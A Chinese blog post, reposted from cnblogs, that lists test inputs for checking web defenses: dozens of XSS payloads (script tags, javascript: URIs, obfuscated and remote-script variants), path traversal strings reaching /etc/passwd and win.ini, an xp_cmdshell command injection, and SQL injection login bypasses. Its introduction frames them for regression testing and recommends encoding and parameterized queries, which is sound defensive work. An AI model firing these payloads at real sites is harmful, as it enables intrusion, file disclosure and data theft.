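需要防范的XSS攻击(测试输入样例清单)
说明:下列样例除XSS外,还混有路径遍历和SQL注入的测试输入。清单无法穷举所有变形,适合用来回归验证防护是否生效;防护本身应依靠按输出上下文编码、参数化查询和路径规范化校验,而不是对这些字符串逐条做黑名单过滤。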
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
原文地址:https://www.cnblogs.com/evlon/p/849543.html